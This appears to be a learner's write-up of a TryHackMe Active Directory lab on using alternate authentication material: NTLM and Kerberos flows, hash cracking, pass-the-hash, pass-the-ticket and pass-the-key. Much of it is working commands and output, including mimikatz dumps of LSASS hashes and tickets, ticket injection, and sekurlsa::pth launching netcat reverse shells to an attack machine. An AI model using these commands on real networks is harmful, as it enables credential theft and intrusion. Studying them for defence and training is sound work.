Use of alternate authentication material

NTLM authentication flow

NTLM Auth Flow
This is for domain authentication. In local authentication, this process only occurs
between the client and server, as the server keeps the user's NTLM hash in the SAM
  • If an attacker manages to compromise a machine where a domain user is logged in, the attacker may be able to dump the domain user’s NTLM hash from memory by using a tool like mimikatz or other methods. The attacker could try to crack the hash(es) and user passwords.

  • User sends hash (not password). This allows an attacker to authenticate as a user in certain situations without ever needing to know a password, called pass-the-hash. It does require dumping hashes locally or remotely.

Kerberos authentication flow

Ticket Granting Ticket:

Kerberos TGT Auth Flow
As long as the session has not lapsed, the user can reuse the TGT as often as needed
to request a TGS.

Ticket Granting Service:

Kerberos TGS Auth Flow
The TGS also has a service session key, and when the SP decrypts the ticket, the SP
will have a session key for the user.

User Authentication:

Kerberos TGS Auth Flow

Pass-the-Ticket requires both the ticket and the service session key in order to pass a TGS to a service principal to authenticate as a user. A TGT (Golden ticket) allows an attacker to request multiple TGSs (Silver tickets) on behalf of a user.

  • When a user requests a TGS, they send an encrypted timestamp derived from their password. The algorithm used to create this key can be DES (disabled by default on newer Windows installations), RC4, AES218, or AES256, and can perhaps be extracted using mimikatz. If any of these keys are available on the host, then we can try to request a TGT as the user the Pass-the-Key way.

  • The RC4 hash is equal to a user’s NTLM hash. If a users’ NTLM hashes were dumped from LSASS during enumeration on a domain-joined host, and RC4 a valid encryption algorithm, then these are RC4 hashes, which could be used to request a TGT the Overpass-the-Hash way.

Cracking hashes

As a result of extracting credentials from a host where we have attained administrative privileges, we might get clear-text passwords, or hashes that can be easily cracked.

NTLM hash (NTHash)

These hashes can be obtained by dumping the SAM database or using mimikatz. They are also stored on domain controllers in the NTDS file. These are the hashes that can be used to pass-the-hash.

Usually people call this the NTLM hash (or just NTLM), which is misleading, as Microsoft refers to this as the NTHash (at least in some places).



The algorithm:


UTF-16-LE is the little endian UTF-16. Windows used this instead of the standard big endian.


john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

NTLMv1 (Net-NTLMv1) hash

The NTLM protocol uses the NTHash in a challenge/response between a server and a client. The v1 of the protocol uses both the NT and LM hash, depending on configuration and on what is available.

A way of obtaining a response to crack from a client, responder can be used. The value to crack would be the K1 | K2 | K3. Version 1 is deprecated, but might still be used in some old systems on the network.



The algorithm:

C = 8-byte server challenge, random
K1 | K2 | K3 = LM/NT-hash | 5-bytes-0
response = DES(K1,C) | DES(K2,C) | DES(K3,C)


john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

NTLMv2 (Net-NTLMv2) hash

The new and improved version of the NTLM protocol, which makes it a bit harder to crack. The concept is the same as NTLMv1, but a different algorithm and responses are sent to the server. Can also be captured with responder. This is the Default in Windows since Windows 2000.



The algorithm:

SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*


john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt


The NTLM challenge sent during authentication can be responded to just by knowing the password hash. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can pass-the-hash (PtH) for authentication.

Assuming NTLMv2, To extract NTLM hashes, use mimikatz to read the local SAM or extract hashes directly from LSASS memory.

Extracting NTLM hashes from local SAM will only allow getting hashes from local users on the machine. No domain user hashes will be available.

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # lsadump::sam

Extracting NTLM hashes from LSASS memory will give any NTLM hashes for local users and any domain user that has recently logged onto the machine.

mimikatz # privilege::debug
mimikatz # token::elevate

mimikatz # sekurlsa::msv 

The extracted hashes can be used in a PtH attack by using mimikatz to inject an access token for the target user on a reverse shell (or any other command):

mimikatz # token::revert

mimikatz # sekurlsa::pth /user:<username> /domain:<domainname> /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe <IP attack machine> 5555"

token::revert reestablishes the original token privileges, because trying to pass-the-hash with an elevated token will not work.

Run a reverse listener on the attack machine:

nc -lnvp 5555

Running the whoami command on this shell, it will still show the original user from before doing the PtH, but any command run from here will use the credentials thet were injected.

Some Linux tools have built-in support for PtH attacks using different protocols. Depending on which services are available, try:

Connect to RDP using PtH:

xfreerdp /v:<IP target> /u:<domainname>\\<username> /pth:<ntlmhash>

Connect via psexec using PtH: -hashes <ntlmhash> <domainname>/<username>@<IP target>

Note: Only the linux version of psexec supports PtH.

Connect to WinRM using PtH:

evil-winrm -i <IP target> -u <username> -H <ntlmhash>


It may be possible to extract Kerberos tickets and session keys from LSASS memory using mimikatz. This usually requires having SYSTEM privileges on the attacked machine:

mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export

Extracting TGTs will require administrator privileges, and extracting TGSs can be done with a low-privileged account (only the ones assigned to that account).

We need the ticket and its corresponding session key. Inject the ticket into the current session:

mimikatz # kerberos::ptt <ticket>

Where ticket looks something like:


Injecting tickets in our own session does not require administrator privileges. After this, the tickets will be available for any tools used for lateral movement. To check if the tickets were correctly injected, exit out of the mimikatz session and:

za\ C:\> klist


This attack is similar to PtH but then for Kerberos networks.

Obtain the Kerberos encryption keys from memory with mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::ekeys

Get a reverse shell. Depending on the available keys:


mimikatz # sekurlsa::pth /user:Administrator / /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe <IP attack machine> 5556"

AES128 hash:

mimikatz # sekurlsa::pth /user:Administrator / /aes128:b65ea8151f13a31d01377f5934bf3883 /run:"c:\tools\nc64.exe -e cmd.exe <IP attack machine> 5556"

If we have the AES256 hash:

mimikatz # sekurlsa::pth /user:Administrator / /aes256:b54259bbff03af8d37a138c375e29254a2ca0649337cc4c73addcd696b4cdb65 /run:"c:\tools\nc64.exe -e cmd.exe <IP attack machine> 5556"

To receive the reverse shell, run a listener on the attack machine:

nc -nlvp 5556


The given credentials will grant t2 administrative access to THMJMP2, allowing for the use of mimikatz to dump the authentication material needed for any of the applied techniques. Both mimikatz and psexec64 are available at C:\tools on THMJMP2. Perform a Pass-the-Hash, Pass-the-Ticket or Pass-the-Key against domain user t1_toby.beck and get the flag.

Using an ssh session:


Start mimikatz:

za\t2_felicia.dean@THMJMP2 C:\Users\t2_felicia.dean>powershell                  
Windows PowerShell                                                              
Copyright (C) 2016 Microsoft Corporation. All rights reserved.                  

PS C:\Users\t2_felicia.dean> cd C:/Tools 

PS C:\Tools> ./mimikatz.exe                                                     

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53                    
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                     
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( )        
 ## \ / ##       >                         
 '## v ##'       Vincent LE TOUX             ( )       
  '#####'        > / ***/       

Elevate privileges:

mimikatz # privilege::debug                                                     
Privilege '20' OK
mimikatz # token::elevate                                                       
Token Id  : 0                                                                   
User name :                                                                     
SID name  : NT AUTHORITY\SYSTEM                                                 

504     {0;000003e7} 1 D 16943          NT AUTHORITY\SYSTEM     S-1-5-18        
(04g,21p)       Primary                                                         
 -> Impersonated !                                                              
 * Process Token : {0;0012e3cf} 0 D 1265501     ZA\t2_felicia.dean      S-1-5-21
-3330634377-1326264276-632209373-4605   (12g,24p)       Primary                 
 * Thread Token  : {0;000003e7} 1 D 1345000     NT AUTHORITY\SYSTEM     S-1-5-18
(04g,21p)       Impersonation (Delegation) 

Dump any cached NTLM hashes from the LSASS process memory:

mimikatz # sekurlsa::msv

Authentication Id : 0 ; 398808 (00000000:000615d8)                              
Session           : RemoteInteractive from 3                                    
User Name         : t1_toby.beck5                                               
Domain            : ZA                                                          
Logon Server      : THMDC                                                       
Logon Time        : 10/14/2022 9:28:50 PM                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4620               
        msv :                                                                   
         [00000003] Primary                                                     
         * Username : t1_toby.beck5                                             
         * Domain   : ZA                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                  
         * DPAPI    : 0537b9105954f5d1d1bc2f1763d86fd6 

Inject with mimikatz

Using an ssh session mimics a reverse shell, but we can not use /run:"cmd.exe" because we can not spawn a sub-shell. Instead, sekurlsa::pth is going to inject t1_toby.beck’s NTLM hash into the cmd.exe reverse shell back to Kali:

First, start a listener on the attack machine:

sudo nc -lnvp 6666


mimikatz # token::revert                                                        
 * Process Token : {0;0012e3cf} 0 D 1265501     ZA\t2_felicia.dean      S-1-5-21
-3330634377-1326264276-632209373-4605   (12g,24p)       Primary                 
 * Thread Token  : no token                                                                             

mimikatz # sekurlsa::pth /user:t1_toby.beck / /ntlm:533f1
bd576caa912bdb9da284bbc60fe /run:"C:\tools\nc64.exe -e cmd.exe 6666 
user    : t1_toby.beck                                                          
domain  :                                                      
program : C:\tools\nc64.exe -e cmd.exe 6666                         
impers. : no                                                                    
NTLM    : 533f1bd576caa912bdb9da284bbc60fe                                      
  |  PID  9372                                                                  
  |  TID  9424                                                                  
  |  LSA Process is now R/W                                                     
  |  LUID 0 ; 1632307 (00000000:0018e833)                                       
  \_ msv1_0   - data copy @ 0000015AF0327BF0 : OK !                             
  \_ kerberos - data copy @ 0000015AF1138A28                                    
   \_ aes256_hmac       -> null                                                 
   \_ aes128_hmac       -> null                                                 
   \_ rc4_hmac_nt       OK                                                      
   \_ rc4_hmac_old      OK                                                      
   \_ rc4_md4           OK                                                      
   \_ rc4_hmac_nt_exp   OK                                                      
   \_ rc4_hmac_old_exp  OK                                                      
   \_ *Password replace @ 0000015AF112E8C8 (32) -> null   

On the attack machine the shell is received:

$ sudo nc -lnvp 6666
[sudo] password for nina: 
Ncat: Version 7.92 ( )
Ncat: Listening on :::6666
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

Having a command prompt with his credentials loaded, use winrs to connect to a command prompt on THMIIS. Since t1_toby.beck’s credentials are already injected in your session as a result of the attacks, you can use winrs without specifying any credentials, and it will use the ones available to the current session:

C:\Windows\system32>winrs.exe cmd
winrs.exe cmd
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

The flag is on t1_toby.beck’s desktop on THMIIS.

C:\Users\t1_toby.beck>cd Desktop
cd Desktop

 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\t1_toby.beck\Desktop

06/17/2022  08:01 PM    <DIR>          .
06/17/2022  08:01 PM    <DIR>          ..
06/15/2022  11:29 PM            58,368 Flag.exe
               1 File(s)         58,368 bytes
               2 Dir(s)  46,545,506,304 bytes free


Impacket from kali

$ impacket-wmiexec -hashes ':533f1bd576caa912bdb9da284bbc60fe' ''
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands





mimikatz # sekurlsa::tickets /export 

In another ssh session:

za\t2_felicia.dean@THMJMP2 C:\tools>dir                                         
 Volume in drive C has no label.                                                
 Volume Serial Number is F4B0-FCB9                                              

 Directory of C:\tools                                                          

10/14/2022  10:19 PM             1,685 [0;1d7a0d]                                                  
10/14/2022  10:19 PM             1,537 [0;1d7a0d]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi                                                       

Back to mimikatz:

mimikatz # kerberos::ptt [0;1d7a0d]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi                                                                     

* File: '[0;1d7a0d]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi': OK

Leave mimikatz and check:

mimikatz # exit                                                                 
PS C:\Tools> klist                                                              

Current LogonId is 0:0x12e3cf                                                   

Cached Tickets: (1)                                                             

#0>     Client: t1_toby.beck @ ZA.TRYHACKME.COM                                 
        Server: krbtgt/ZA.TRYHACKME.COM @ ZA.TRYHACKME.COM                      
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96                    
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent nam
        Start Time: 10/14/2022 22:00:50 (local)                                 
        End Time:   10/15/2022 8:00:50 (local)                                  
        Renew Time: 10/21/2022 22:00:50 (local)                                 
        Session Key Type: RSADSI RC4-HMAC(NT)                                   
        Cache Flags: 0x1 -> PRIMARY                                             
        Kdc Called:        

Using winrs.exe:

PS C:\Tools> winrs.exe cmd                           
Microsoft Windows [Version 10.0.17763.1098]                                     
(c) 2018 Microsoft Corporation. All rights reserved.